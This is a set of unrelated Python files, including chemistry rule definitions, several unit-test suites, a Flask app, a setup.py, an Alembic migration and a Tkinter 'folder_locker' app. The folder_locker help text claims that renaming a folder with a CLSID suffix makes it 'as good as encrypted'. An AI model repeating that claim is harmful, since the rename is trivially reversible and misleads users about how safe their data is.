edge [ source 1 target 2 label "=" ]
edge [ source 3 target 4 label "-" ]
]
# The -OH should not be a part of a carboxylic acid
constrainAdj [ id 1 op "=" count 0
nodeLabels [ label "O" ]
edgeLabels [ label "=" ]
]
# The R can be either C#N or C=O
constrainAdj [ id 6 op "=" count 1
nodeLabels [ label "O" label "N" ]
edgeLabels [ label "=" label "#" ] # Warning: this may allow =N to be matched as well
]
constrainAdj [ id 7 op ">=" count 1
nodeLabels [ label "O" label "N" ]
edgeLabels [ label "-" label "=" label "#" ] # Warning: this may allow =N to be matched as well
]
]""")
knoevenagel_h_inv = ruleGMLString("""rule [
ruleID "Knoevenagel H (inv)"
labelType "term"
left [
edge [ source 1 target 3 label "-" ]
edge [ source 1 target 2 label "-" ]
edge [ source 2 target 4 label "-" ]
]
context [
node [ id 1 label "C" ]
node [ id 2 label "O" ]
node [ id 3 label "C" ]
node [ id 4 label "H" ]
node [ id 5 label "*" ]
node [ id 6 label "C" ]
edge [ source 3 target 6 label "-" ]
edge [ source 3 target 5 label "-" ]
]
right [
edge [ source 1 target 2 label "=" ]
edge [ source 3 target 4 label "-" ]
]
# The -OH should not be a part of a carboxylic acid
constrainAdj [ id 1 op "=" count 0
nodeLabels [ label "O" ]
edgeLabels [ label "=" ]
]
# The R can be either C#N or C=O
constrainAdj [ id 6 op "=" count 1
nodeLabels [ label "O" label "N" ]
edgeLabels [ label "=" label "#" ] # Warning: this may allow =N to be matched as well
]
constrainAdj [ id 3 op ">=" count 1
nodeLabels [ label "O" label "N" ]
edgeLabels [ label "-" label "=" label "#" ] # Warning: this may allow =N to be matched as well
]
]""")
|
#!/usr/bin/env python
from __future__ import absolute_import, print_function
import ssl
import time
import unittest
import libcloud.common.types as cloud_types
import mock
import arvnodeman.computenode.driver.ec2 as ec2
from . import testutil
class EC2ComputeNodeDriverTestCase(testutil.DriverTestMixin, unittest.TestCase):
TEST_CLASS = ec2.ComputeNodeDriver
def test_driver_instantiation(self):
kwargs = {'key': 'testkey'}
driver = self.new_driver(auth_kwargs=kwargs)
self.assertTrue(self.driver_mock.called)
self.assertEqual(kwargs, self.driver_mock.call_args[1])
def test_list_kwargs_become_filters(self):
# We're also testing tag name translation.
driver = self.new_driver(list_kwargs={'tag_test': 'true'})
driver.list_nodes()
list_method = self.driver_mock().list_nodes
self.assertTrue(list_method.called)
self.assertEqual({'tag:test': 'true'},
list_method.call_args[1].get('ex_filters'))
def test_create_image_loaded_at_initialization(self):
list_method = self.driver_mock().list_images
list_method.return_value = [testutil.cloud_object_mock(c)
for c in 'abc']
driver = self.new_driver(create_kwargs={'image_id': 'id_b'})
self.assertEqual(1, list_method.call_count)
def test_create_includes_ping_secret(self):
arv_node = testutil.arvados_node_mock(info={'ping_secret': 'ssshh'})
driver = self.new_driver()
driver.create_node(testutil.MockSize(1), arv_node)
create_method = self.driver_mock().create_node
self.assertTrue(create_method.called)
self.assertIn('ping_secret=ssshh',
create_method.call_args[1].get('ex_userdata',
'arg missing'))
def test_hostname_from_arvados_node(self):
arv_node = testutil.arvados_node_mock(8)
driver = self.new_driver()
self.assertEqual('compute8.zzzzz.arvadosapi.com',
driver.arvados_create_kwargs(testutil.MockSize(1), arv_node)['name'])
def test_default_hostname_from_new_arvados_node(self):
arv_node = testutil.arvados_node_mock(hostname=None)
driver = self.new_driver()
self.assertEqual('dynamic.compute.zzzzz.arvadosapi.com',
driver.arvados_create_kwargs(testutil.MockSize(1), arv_node)['name'])
def check_node_tagged(self, cloud_node, expected_tags):
tag_mock = self.driver_mock().ex_create_tags
self.assertTrue(tag_mock.called)
self.assertIs(cloud_node, tag_mock.call_args[0][0])
self.assertEqual(expected_tags, tag_mock.call_args[0][1])
def test_post_create_node_tags_from_list_kwargs(self):
expect_tags = {'key1': 'test value 1', 'key2': 'test value 2'}
        list_kwargs = {('tag_' + key): value
                       for key, value in expect_tags.items()}
list_kwargs['instance-state-name'] = 'running'
cloud_node = testutil.cloud_node_mock()
driver = self.new_driver(list_kwargs=list_kwargs)
driver.post_create_node(cloud_node)
self.check_node_tagged(cloud_node, expect_tags)
def test_sync_node(self):
arv_node = testutil.arvados_node_mock(1)
cloud_node = testutil.cloud_node_mock(2)
driver = self.new_driver()
driver.sync_node(cloud_node, arv_node)
self.check_node_tagged(cloud_node,
{'Name': 'compute1.zzzzz.arvadosapi.com'})
def test_node_create_time(self):
refsecs = int(time.time())
reftuple = time.gmtime(refsecs)
node = testutil.cloud_node_mock()
node.extra = {'launch_time': time.strftime('%Y-%m-%dT%H:%M:%S.000Z',
reftuple)}
self.assertEqual(refsecs, ec2.ComputeNodeDriver.node_start_time(node))
def test_node_fqdn(self):
name = 'fqdntest.zzzzz.arvadosapi.com'
node = testutil.cloud_node_mock()
node.name = name
self.assertEqual(name, ec2.ComputeNodeDriver.node_fqdn(node))
def test_cloud_exceptions(self):
for error in [Exception("test exception"),
IOError("test exception"),
ssl.SSLError("test exception"),
cloud_types.LibcloudError("test exception")]:
self.assertTrue(ec2.ComputeNodeDriver.is_cloud_exception(error),
"{} not flagged as cloud exception".format(error))
def test_noncloud_exceptions(self):
self.assertFalse(
ec2.ComputeNodeDriver.is_cloud_exception(ValueError("test error")),
"ValueError flagged as cloud exception")
|
import re
fname = input("Enter file: ")
fhand = open(fname)
numlist = list()
for line in fhand:
line = line.rstrip()
numStr = re.findall('^New Revision: ([0-9]+)', line)
if len(numStr) == 1:
num = float(numStr[0])
numlist.append(num)
if numlist:
    print(sum(numlist)/len(numlist))
else:
    print("No 'New Revision' lines found")
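# Example of the extraction the regex performs (hypothetical input line):
#   re.findall('^New Revision: ([0-9]+)', 'New Revision: 39772') -> ['39772']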
|
"""
Subpackage for future language-specific resources and annotators
"""
|
import six
from sqlalchemy import types
from ..exceptions import ImproperlyConfigured
from .scalar_coercible import ScalarCoercible
ip_address = None
try:
    from ipaddress import ip_address
except ImportError:  # Python 2: fall back to the ipaddr package
    try:
        from ipaddr import IPAddress as ip_address
    except ImportError:
        pass
class IPAddressType(ScalarCoercible, types.TypeDecorator):
"""
Changes IPAddress objects to a string representation on the way in and
changes them back to IPAddress objects on the way out.
IPAddressType uses ipaddress package on Python >= 3 and ipaddr_ package on
    Python 2. In order to use IPAddressType on Python 2 you need to install
    ipaddr_ first.
.. _ipaddr: https://pypi.python.org/pypi/ipaddr
::
        import sqlalchemy as sa
        from sqlalchemy_utils import IPAddressType
        class User(Base):
            __tablename__ = 'user'
            id = sa.Column(sa.Integer, primary_key=True, autoincrement=True)
name = sa.Column(sa.Unicode(255))
ip_address = sa.Column(IPAddressType)
user = User()
user.ip_address = '123.123.123.123'
session.add(user)
session.commit()
user.ip_address # IPAddress object
"""
impl = types.Unicode(50)
cache_ok = True
def __init__(self, max_length=50, *args, **kwargs):
if not ip_address:
raise ImproperlyConfigured(
"'ipaddr' package is required to use 'IPAddressType' "
"in python 2"
)
super(IPAddressType, self).__init__(*args, **kwargs)
self.impl = types.Unicode(max_length)
def process_bind_param(self, value, dialect):
return six.text_type(value) if value else None
def process_result_value(self, value, dialect):
return ip_address(value) if value else None
def _coerce(self, value):
return ip_address(value) if value else None
@property
def python_type(self):
return self.impl.type.python_type
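# A hedged round-trip sketch of the conversions above (assuming this module's
# relative imports resolve; the dialect argument is unused by these methods):
#   t = IPAddressType()
#   t.process_bind_param(ip_address(u'123.123.123.123'), None)
#   # -> u'123.123.123.123' (stored as text)
#   t.process_result_value(u'123.123.123.123', None)
#   # -> IPv4Address('123.123.123.123')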
|
import pytest
pytest.importorskip("pytorch_lightning")
from pugh_torch.callbacks import TensorBoardAddClassification
from pugh_torch.utils import TensorBoardLogger
import torch
@pytest.fixture
def fake_batch():
x = torch.rand(5, 3, 224, 224)
torch.manual_seed(0)
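    # seeding here makes the torch.rand(5, 10) logits in fake_pl_module
    # deterministic (the Pred values asserted below rely on this), while
    # x above stays random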
    y = torch.LongTensor([4, 3, 1, 0, 2])
return x, y
@pytest.fixture
def fake_pl_module(mocker):
pl_module = mocker.MagicMock()
pl_module.last_logits = torch.rand(5, 10)
return pl_module
@pytest.fixture
def classes():
return ["a", "b", "c", "d", "e", "f", "g", "h", "i", "j"]
@pytest.fixture
def fake_trainer(mocker):
trainer = mocker.MagicMock()
trainer.logger = mocker.MagicMock(TensorBoardLogger)
trainer.global_step = 5555
return trainer
def test_callback_action(mocker, tmp_path, fake_trainer, fake_batch, fake_pl_module):
callback = TensorBoardAddClassification()
fake_trainer.global_step = callback.logging_batch_interval
dataloader_idx = 0
callback.on_train_batch_end(
fake_trainer, fake_pl_module, [], fake_batch, 0, dataloader_idx
)
fake_trainer.logger.experiment.add_rgb.assert_called_once()
args, kwargs = fake_trainer.logger.experiment.add_rgb.call_args_list[0]
assert args[0] == "train/output"
assert (args[1] == fake_batch[0]).all()
assert kwargs["global_step"] == 20
assert kwargs["labels"] == [
"Truth: 4 (N/A)\nPred: 7 (N/A)",
"Truth: 3 (N/A)\nPred: 7 (N/A)",
"Truth: 1 (N/A)\nPred: 6 (N/A)",
"Truth: 0 (N/A)\nPred: 1 (N/A)",
"Truth: 2 (N/A)\nPred: 6 (N/A)",
]
def test_callback_skip(mocker, tmp_path, fake_batch, fake_trainer, fake_pl_module):
callback = TensorBoardAddClassification()
fake_trainer.global_step = callback.logging_batch_interval - 1
dataloader_idx = 0
callback.on_train_batch_end(
fake_trainer, fake_pl_module, [], fake_batch, 0, dataloader_idx
)
fake_trainer.logger.experiment.add_rgb.assert_not_called()
def test_callback_classes(
mocker, tmp_path, fake_trainer, fake_batch, fake_pl_module, classes
):
callback = TensorBoardAddClassification(classes=classes)
fake_trainer.global_step = callback.logging_batch_interval
dataloader_idx = 0
callback.on_train_batch_end(
fake_trainer, fake_pl_module, [], fake_batch, 0, dataloader_idx
)
fake_trainer.logger.experiment.add_rgb.assert_called_once()
args, kwargs = fake_trainer.logger.experiment.add_rgb.call_args_list[0]
assert args[0] == "train/output"
assert (args[1] == fake_batch[0]).all()
assert kwargs["global_step"] == 20
assert kwargs["labels"] == [
f"Truth: 4 ({classes[4]})\nPred: 7 ({classes[7]})",
f"Truth: 3 ({classes[3]})\nPred: 7 ({classes[7]})",
f"Truth: 1 ({classes[1]})\nPred: 6 ({classes[6]})",
f"Truth: 0 ({classes[0]})\nPred: 1 ({classes[1]})",
f"Truth: 2 ({classes[2]})\nPred: 6 ({classes[6]})",
]
|
import flask
from werkzeug.exceptions import NotFound
from werkzeug.exceptions import BadRequest
from werkzeug.exceptions import BadRequestKeyError
from .blueprints import api_v1
def create_app():
app = flask.Flask(__name__)
app.register_blueprint(api_v1.blueprint)
app.register_error_handler(NotFound, _not_found)
app.register_error_handler(BadRequest, _bad_request)
app.register_error_handler(BadRequestKeyError, _missing_parameter)
app.register_error_handler(Exception, _exception_handler)
return app
def _not_found(e):
message = 'resource not found'
return flask.jsonify(error=message), e.code
def _missing_parameter(e):
message = 'missing \'%s\' parameter' % e.args[0]
return flask.jsonify(error=message), e.code
def _bad_request(e):
return flask.jsonify(error=e.description), e.code
def _exception_handler(e):
flask.current_app.logger.exception(e)
return flask.jsonify(error=str(e)), 500
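# Hedged sketch (not part of this module): a view that would trigger
# _missing_parameter. Indexing request.args raises BadRequestKeyError when
# the key is absent, so the client receives
# {"error": "missing 'name' parameter"} with the handler's status code.
#   @api_v1.blueprint.route('/echo')
#   def echo():
#       return flask.jsonify(name=flask.request.args['name'])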
|
from swampdragon.serializers.model_serializer import ModelSerializer
from swampdragon.testing.dragon_testcase import DragonTestCase
from .models import SDModel
from django.db import models
class FooOne2One(SDModel):
name = models.CharField(max_length=20)
class BarOne2One(SDModel):
foo = models.OneToOneField(FooOne2One)
number = models.IntegerField()
class FooSerializer(ModelSerializer):
bar = 'BarSerializer'
class Meta:
model = FooOne2One
update_fields = ('name', 'bar')
class BarSerializer(ModelSerializer):
foo = FooSerializer
class Meta:
model = BarOne2One
update_fields = ('number', 'foo')
class TestModelSerializer(DragonTestCase):
def test_deserialize_with_one_2_one(self):
data = {
'name': 'foo',
'bar': {'number': 5}
}
serializer = FooSerializer(data)
foo = serializer.save()
self.assertEqual(foo.name, data['name'])
self.assertEqual(foo.bar.number, data['bar']['number'])
def test_deserialize_with_reverse_one_2_one(self):
data = {
'number': 123,
'foo': {'name': 'foo'}
}
serializer = BarSerializer(data)
bar = serializer.save()
self.assertEqual(bar.number, data['number'])
self.assertEqual(bar.foo.name, data['foo']['name'])
|
from pathlib import Path
from setuptools import setup, find_packages
package_dir = 'python_data_utils'
root = Path(__file__).parent.resolve()
# Read in package meta from about.py
about_path = root / package_dir / 'about.py'
with about_path.open('r', encoding='utf8') as f:
about = {}
exec(f.read(), about)
# Get readme
readme_path = root / 'README.md'
with readme_path.open('r', encoding='utf8') as f:
readme = f.read()
install_requires = [
'beautifulsoup4', 'dill', 'distance', 'fake-useragent',
'fuzzywuzzy', 'hdbscan', 'ipython', 'ipywidgets', 'joblib',
'matplotlib', 'nltk', 'numba', 'numpy', 'openpyxl',
'pandas', 'parse', 'progressbar2', 'pyppeteer>=0.0.14',
'pyquery', 'pyyaml', 'requests', 'scikit-learn', 'scipy',
'seaborn', 'urlclustering', 'w3lib'
]
tests_require = ['pytest']
extras_require = {
'spark': ['pyspark>=2.4.0,<3.0.0'],
'statsmodels': ['statsmodels']
}
setup(
name=about['__title__'],
description=about['__summary__'],
long_description=readme,
long_description_content_type='text/markdown',
author=about['__author__'],
author_email=about['__email__'],
url=about['__uri__'],
version=about['__version__'],
license=about['__license__'],
packages=find_packages(exclude=('tests*',)),
install_requires=install_requires,
    tests_require=tests_require,
extras_require=extras_require,
zip_safe=True,
include_package_data=True,
classifiers=[
'Intended Audience :: Developers',
'Topic :: Scientific/Engineering',
'Topic :: Software Development :: Libraries',
'Topic :: Utilities',
'Operating System :: OS Independent',
'Programming Language :: Python :: 3.7'
]
)
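# Hedged usage note (assuming about['__title__'] matches package_dir, i.e.
# the distribution is published as 'python_data_utils'):
#   pip install python_data_utils                 # core dependencies
#   pip install "python_data_utils[spark]"        # adds pyspark 2.4.x
#   pip install "python_data_utils[statsmodels]"  # adds statsmodels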
|
#you will need to install keyring
from platform import system
import os
import tkinter.messagebox
import tkinter.simpledialog
from tkinter import *
from shutil import rmtree
import keyring
from hashlib import sha256
#generic names
FILENAME_USER = "folder_locker.v2.USER"
FILENAME_PASS = "folder_locker.v2.PASS"
GENUSER = os.getlogin()
root = Tk()
root.title("folder_locker")
root.iconbitmap(default="folder_locker.ico")
root.geometry("280x127")
root.configure(bg='white')
root.resizable(False, False)
def HASH(string):
return sha256(str(string).encode()).hexdigest()
def clear_root():
def f_Forget(window):
_list = window.winfo_children()
for item in _list:
if item.winfo_children():
_list.extend(item.winfo_children())
return _list
widget_list = f_Forget(root)
for item in widget_list:
item.destroy()
def main():
root.geometry("305x390")
root.configure(bg='grey')
root.deiconify()
def change_password():
try:
            old_password = tkinter.simpledialog.askstring("old password", "please enter your old password: ", show="•")
if HASH(old_password) == keyring.get_password(FILENAME_PASS, GENUSER):
keyring.delete_password(FILENAME_PASS, GENUSER)
root.withdraw()
password = tkinter.simpledialog.askstring("password", "please choose a password: ", show="•")
root.deiconify()
keyring.set_password(FILENAME_PASS, GENUSER, HASH(password))
                yes_or_no = tkinter.messagebox.askyesno("restart", "the program must be closed to save the changes. close it now?")
if yes_or_no:
exit(0)
else:
tkinter.messagebox.showerror("error", "wrong password.")
        except Exception:
tkinter.messagebox.showinfo("error", "an error occurred when trying to change your password. ")
def change_username():
try:
old_username = tkinter.simpledialog.askstring("old username", "please enter your old username: ")
if HASH(old_username) == keyring.get_password(FILENAME_USER, GENUSER):
keyring.delete_password(FILENAME_USER, GENUSER)
root.withdraw()
username = tkinter.simpledialog.askstring("username", "please choose a username: ")
root.deiconify()
keyring.set_password(FILENAME_USER, GENUSER, HASH(username))
                yes_or_no = tkinter.messagebox.askyesno("restart", "the program must be closed to save the changes. close it now?")
if yes_or_no:
exit(0)
else:
tkinter.messagebox.showerror("error", "wrong username.")
        except Exception:
tkinter.messagebox.showinfo("error", "an error occurred when trying to change your username. ")
def change_working_directory():
try:
print(os.path.expanduser("~"))
new_working_directory = tkinter.simpledialog.askstring("change current working directory",
"enter your new working directory")
with open("fldrlck.setting", "w") as f:
f.write(new_working_directory)
f.close()
set_working_directory()
update_current_working_directory()
update_listbox()
except:
tkinter.messagebox.showinfo("error", "an error occurred when trying to change the working directory. ")
def set_working_directory():
global data
try:
with open("fldrlck.setting", "r") as f:
data2 = f.read()
if len(data2) == 0:
root.withdraw()
while True:
set_working_dir = tkinter.simpledialog.askstring("current working directory not set",
"please set a working directory. you can always change this. include full directory.")
if not os.path.exists(set_working_dir):
tkinter.messagebox.showinfo("invalid directory", "invalid directory")
else:
break
with open("fldrlck.setting", "w") as g:
g.write(set_working_dir)
g.close()
root.deiconify()
f.close()
with open("fldrlck.setting", "r") as f:
data = f.read()
os.chdir(data)
f.close()
except:
exit(0)
set_working_directory()
    def how_does_it_work():
        tkinter.messagebox.showinfo("how does it work?",
                                    "this application does not 'encrypt' the folder, but rather makes it inaccessible by appending a CLSID to the folder name. without the specific CLSID used, your folder is as good as encrypted! ")
    def author():
        tkinter.messagebox.showinfo("author",
                                    "created by a person who HATES the modern panopticon, and believes in the right to privacy!")
    def f_about():
        tkinter.messagebox.showinfo("about", "created to lock your folders. invasion of privacy no more!")
def instruction():
tkinter.messagebox.showinfo("how to use", "firstly, create a folder that you wish to lock, "
"either in this app or in file explorer. then, select it in the listbox and click the 'lock/unlock' button. this "
"will lock it, and to unlock simply press the button again.")
def encrypt_directory(directory):
try:
directory = str(directory).replace(" -- UNLOCKED", "")
except:
pass
try:
directory = str(directory).replace(" -- LOCKED", "")
except:
pass
if len(directory) != 0:
try:
global my_string
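                # per how_does_it_work(): the CLSID suffix makes Explorer resolve the folder as a shell object instead of opening it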
my_string = directory + ".{0010890e-8789-413c-adbc-48f5b511b3af}"
                if not os.path.exists(directory):
                    if not os.path.exists(directory + ".{0010890e-8789-413c-adbc-48f5b511b3af}"):
                        os.mkdir(directory)
                    else:
                        os.popen('attrib -h "' + my_string + '"')
                        os.popen('attrib -h "' + directory + '"')
                        os.rename(my_string, directory)
                else:
                    os.rename(directory, my_string)
                    os.popen('attrib +h "' + my_string + '"')
update_listbox()
except:
tkinter.messagebox.showinfo("error", "an error occurred when trying to lock your folder. ")
def remove_directory(directory):
if len(directory) != 0:
try:
if tkinter.messagebox.askyesno("rmdir", "remove directory? this action cannot be undone."):
rmtree(directory)
update_listbox()
except:
tkinter.messagebox.showinfo("error", "an error occurred when trying to delete this folder. this may be because the folder is locked.")
def update_current_working_directory():
working_directory_label.configure(text="cwd: " + os.getcwd())
def update_listbox():
try:
global data
list_of_folders = os.listdir(data)
#attempting to filter out system files, as os.path.isdir and isfile had a couple of bugs for me
system_files = ['$RECYCLE.BIN', 'System Volume Information', 'desktop.ini']
list_box.delete(0, END)
            directories = []
            verified_directories = []
            for item in list_of_folders:
                if os.path.isdir(item):
                    directories.append(item)
            for verified_dir in directories:
                if verified_dir not in system_files:
                    verified_directories.append(verified_dir)
            #removing the CLSIDs from the folder name
            for verified_real_dir in verified_directories:
                if verified_real_dir.endswith(".{0010890e-8789-413c-adbc-48f5b511b3af}"):
                    list_box.insert(END, verified_real_dir.replace(".{0010890e-8789-413c-adbc-48f5b511b3af}", " -- LOCKED"))
                else:
                    list_box.insert(END, verified_real_dir + " -- UNLOCKED")
except:
pass
def make_directory(directory):
if len(directory) != 0:
try:
os.mkdir(directory)
update_listbox()
make_directory_entry.delete(0, END)
except:
tkinter.messagebox.showinfo("error", "an error occurred when trying to make your folder. this may be because the name is invalid.")
def logout():
clear_root()
root.geometry("250x127")
root.configure(bg='white')
startup()
my_menu = Menu(root)
root.config(menu=my_menu)
about_menu = Menu(my_menu, tearoff=False, font=("Ariel", 10))
settings_menu = Menu(my_menu, tearoff=False, font=("Ariel", 10))
my_menu.add_cascade(label='about', menu=about_menu, font=("Ariel", 10))
my_menu.add_cascade(label='settings', menu=settings_menu, font=("Ariel", 10))
settings_menu.add_command(label="change working directory", command=change_working_directory, font=("Ariel", 10))
settings_menu.add_command(label="change password", command=change_password, font=("Ariel", 10))
settings_menu.add_command(label="change username", command=change_username, font=("Ariel", 10))
settings_menu.add_command(label="logout", command=logout, font=("Ariel", 10))
settings_menu.add_separator()
settings_menu.add_command(label="exit", command=lambda: exit(0), font=("Ariel", 10))
about_menu.add_command(label='about', command=f_about, font=("Ariel", 10))
about_menu.add_command(label='methodology', command=how_does_it_work, font=("Ariel", 10))
about_menu.add_command(label="how to use", command=instruction, font=("Ariel", 10))
about_menu.add_command(label="about the author", command=author, font=("Ariel", 10))
list_box = Listbox(root, width=50)
list_box.grid(row=0, column=0)
update_listbox()
frame_for_button_and_entry = Frame(root, background="grey")
frame_for_button_and_entry.grid(row=1, column=0, columnspan=2, pady=5)
update_button = Button(frame_for_button_and_entry, text="update", width=5, command=update_listbox)
update_button.grid(row=0, column=0)
    dir_to_make = StringVar()
make_directory_entry = Entry(frame_for_button_and_entry, textvariable=dir_to_make, width=35)
make_directory_entry.grid(row=0, column=1, padx=15)
make_directory_button = Button(root, text="make directory", width=40, height=2, pady=5,
command=lambda: make_directory(make_directory_entry.get()))
make_directory_button.grid(row=2, column=0)
delete_directory_button = Button(root, text="remove directory", width=40, height=2, pady=5,
command=lambda: remove_directory(list_box.get(ANCHOR)))
delete_directory_button.grid(row=3, column=0)
encrypt_button = Button(root, text="lock/unlock directory", width=40, height=2, pady=5,
command=lambda: encrypt_directory(list_box.get(ANCHOR)))
encrypt_button.grid(row=4, column=0)
frame_for_label = Frame(root)
working_directory_label = Label(frame_for_label, text="CWD: " + os.getcwd(), background="grey")
frame_for_label.grid(row=5, column=0)
working_directory_label.grid(row=0, column=0)
def startup():
global USERPASSWORD, USERNAME
# ======================================================================
password_frame = Frame(root, pady=6, background="white")
username_frame = Frame(root, pady=6, background="white")
username_frame.pack()
password_frame.pack()
password_label = Label(password_frame, text="password: ", background="white")
password_label.grid(row=0, column=0)
entry_password = Entry(password_frame, show="•", bg="white")
entry_password.grid(row=0, column=1)
username_label = Label(username_frame, text="username: ", background="white")
username_label.grid(row=0, column=0)
entry_username = Entry(username_frame, bg="white")
entry_username.grid(row=0, column=1)
# ======================================================================
def enter():
try:
global password_variable, username_variable, username, password
password_variable = entry_password.get()
username_variable = entry_username.get()
if HASH(password_variable) == password and HASH(username_variable) == username:
incorrect_label.config(text="")
clear_root()
main()
else:
entry_username.delete(0, END)
entry_password.delete(0, END)
incorrect_label.config(text="incorrect password/username.")
except:
tkinter.messagebox.showinfo("error", "an error occurred when trying to verify your credentials. ")
enter_button = Button(root, text="verify", command=enter, bg="white", activebackground="white", width=20)
enter_button.pack()
incorrect_label = Label(root, text="", bg="white")
incorrect_label.pack()
if __name__ == '__main__':
if not system() == "Windows":
tkinter.messagebox.showerror("error", "This program only works on Windows machines.")
exit(0)
if not os.path.exists("fldrlck.setting"):
open("fldrlck.setting", "a+").close()
if keyring.get_password(FILENAME_USER, GENUSER) is None:
root.withdraw()
username_raw = tkinter.simpledialog.askstring("username", "please choose a username: ")
if username_raw:
username = HASH(username_raw)
keyring.set_password(FILENAME_USER, GENUSER, username)
root.deiconify()
else:
exit(0)
if keyring.get_password(FILENAME_PASS, GENUSER) is None:
root.withdraw()
password_raw = tkinter.simpledialog.askstring("password", "please choose a password: ", show="•")
if password_raw:
password = HASH(password_raw)
keyring.set_password(FILENAME_PASS, GENUSER, password)
root.deiconify()
else:
exit(0)
password = keyring.get_password(FILENAME_PASS, GENUSER)
username = keyring.get_password(FILENAME_USER, GENUSER)
startup()
root.mainloop()
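# A minimal sketch of the CLSID renaming trick how_does_it_work() describes,
# assuming Windows; lock()/unlock() are illustrative helpers, not the app's
# exact code path (the app also filters system files and updates its UI).
import os
CLSID_SUFFIX = ".{0010890e-8789-413c-adbc-48f5b511b3af}"
def lock(folder):
    # rename so Explorer resolves the name as a shell object, then hide it
    os.rename(folder, folder + CLSID_SUFFIX)
    os.system('attrib +h "' + folder + CLSID_SUFFIX + '"')
def unlock(folder):
    # unhide the renamed folder, then restore its original name
    os.system('attrib -h "' + folder + CLSID_SUFFIX + '"')
    os.rename(folder + CLSID_SUFFIX, folder)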
|
"""create_game_table
Revision ID: 492408566602
Revises: 5a503b995cfd
Create Date: 2021-04-04 23:03:42.761266
"""
import sqlalchemy as sa
from alembic import op
from sqlalchemy.dialects import postgresql
# revision identifiers, used by Alembic.
revision = "492408566602"
down_revision = "5a503b995cfd"
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table(
"game",
sa.Column("uuid", postgresql.UUID(), nullable=False),
sa.Column("date_created", sa.DateTime(), nullable=False),
sa.Column("player_created", postgresql.UUID(), nullable=False),
sa.ForeignKeyConstraint(
["player_created"],
["player.uuid"],
),
sa.PrimaryKeyConstraint("uuid"),
)
op.create_foreign_key(
"player_username_user_username_fk", "player", "user", ["username"], ["username"]
)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_constraint("player_username_user_username_fk", "player", type_="foreignkey")
op.drop_table("game")
# ### end Alembic commands ###
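# Hedged usage note -- the standard Alembic CLI applies/rolls back this file:
#   alembic upgrade 492408566602      # apply this revision
#   alembic downgrade 5a503b995cfd    # return to the previous revision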
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from .vimba_object import VimbaObject
from ctypes import c_void_p
# system features are automatically readable as attributes.
class VimbaSystem(VimbaObject):
"""
A Vimba system object. This class provides the minimal access
to Vimba functions required to control the system.
"""
# own handle is inherited as self._handle
def __init__(self):
super(VimbaSystem, self).__init__()
# set own handle manually
self._handle = c_void_p(1)
|
import os
import cohmo
from cohmo import app
import unittest
import tempfile
from unittest.mock import *
import time
from base64 import b64encode
from flask import json, jsonify
from cohmo.table import Table, TableStatus
from cohmo.history import HistoryManager
from cohmo.authentication_manager import AuthenticationManager
from cohmo.views import init_chief, init_authentication_manager
def generate_tempfile(content):
with tempfile.NamedTemporaryFile(delete=False) as t_file:
t_file.write(content.encode())
return t_file.name
class CohmoTestCase(unittest.TestCase):
def setUp(self):
cohmo.app.config['TEAMS_FILE_PATH'] = generate_tempfile('FRA,ITA,ENG,USA,CHN,IND,KOR,GER')
cohmo.app.config['HISTORY_FILE_PATH'] = generate_tempfile('USA,T2,5,10,ID1\n' + 'ENG,T5,8,12,ID2\n' + 'CHN,T5,13,17,ID3\n' + 'NLD,T3,16,29,ID4')
cohmo.app.config['TABLE_FILE_PATHS'] = {
'T2': generate_tempfile('''
{
"name": "T2",
"problem": "3",
"coordinators": ["Franco Anselmi", "Antonio Cannavaro"],
"queue": ["ITA", "ENG", "IND"],
"status": "BUSY"
}'''),
'T3': generate_tempfile('''
{
"name": "T3",
"problem": "4",
"coordinators": ["Pippo Pippino", "Topo Topoliino"],
"queue": ["GER", "FRA"],
"status": "VACANT"
}'''),
'T5': generate_tempfile('''
{
"name": "T5",
"problem": "6",
"coordinators": ["Alessandro Maschi", "Giovanni Muciaccia"],
"queue": ["KOR", "IND", "ENG", "USA"],
"status": "CALLING"
}'''),
'T8': generate_tempfile('''
{
"name": "T8",
"problem": "1",
"coordinators": ["Marco Faschi", "Giorgio Gigi"],
"queue": ["KOR", "ENG", "FRA"],
"status": "CORRECTING",
"current_coordination_team": "USA",
"current_coordination_start_time": 10
}'''),
}
cohmo.app.config['AUTHENTICATION_FILE_PATH'] = generate_tempfile('''
{
"admin": {
"password": "pass",
"authorizations": [],
"admin": true
},
"marco": {
"password": "xxx",
"authorizations": ["T2", "T5"]
}
}''')
cohmo.app.testing = True
credentials = b64encode(b'admin:pass').decode('utf-8')
self.headers = {'Authorization': 'Basic ' + credentials}
def tearDown(self):
os.unlink(cohmo.app.config['TEAMS_FILE_PATH'])
os.unlink(cohmo.app.config['HISTORY_FILE_PATH'])
for table in cohmo.app.config['TABLE_FILE_PATHS']:
os.unlink(cohmo.app.config['TABLE_FILE_PATHS'][table])
def test_chief_initialization(self):
chief = cohmo.get_chief()
self.assertTrue('T2' in chief.tables and 'T3' in chief.tables and 'T5' in chief.tables and 'T8' in chief.tables)
self.assertEqual(chief.teams, ['FRA', 'ITA', 'ENG', 'USA', 'CHN', 'IND', 'KOR', 'GER'])
self.assertEqual(chief.tables['T2'].status, TableStatus.BUSY)
self.assertEqual(chief.tables['T3'].status, TableStatus.VACANT)
self.assertEqual(chief.tables['T5'].status, TableStatus.CALLING)
self.assertEqual(chief.tables['T8'].status, TableStatus.CORRECTING)
self.assertEqual(chief.tables['T8'].current_coordination_team, 'USA')
self.assertEqual(chief.tables['T8'].current_coordination_start_time, 10)
self.assertEqual(len(chief.history_manager.corrections), 4)
def test_history(self):
history = HistoryManager(cohmo.app.config['HISTORY_FILE_PATH'])
self.assertTrue(history.add('ITA', 'T2', 10, 20))
self.assertTrue(history.add('FRA', 'T8', 20, 30))
self.assertTrue(history.add('KOR', 'T5', 15, 30))
self.assertFalse(history.delete('ID_NOT_EXISTENT'))
self.assertEqual(len(history.get_corrections({'identifier':'ID2'})), 1)
self.assertTrue(history.delete('ID2'))
self.assertEqual(history.get_corrections({'identifier':'ID2'}), [])
self.assertEqual(len(history.corrections), 6)
# Constructing HistoryManager from the file written by dump_to_file.
history = HistoryManager(cohmo.app.config['HISTORY_FILE_PATH'])
self.assertEqual(len(history.corrections), 6)
self.assertEqual(history.corrections[3].table, 'T2')
self.assertEqual(history.corrections[3].team, 'ITA')
self.assertTrue(history.add('ITA', 'T5', 20, 30))
# Testing various calls to get_corrections.
history = HistoryManager(cohmo.app.config['HISTORY_FILE_PATH'])
self.assertEqual(history.get_corrections({'table':'NOWAY'}), [])
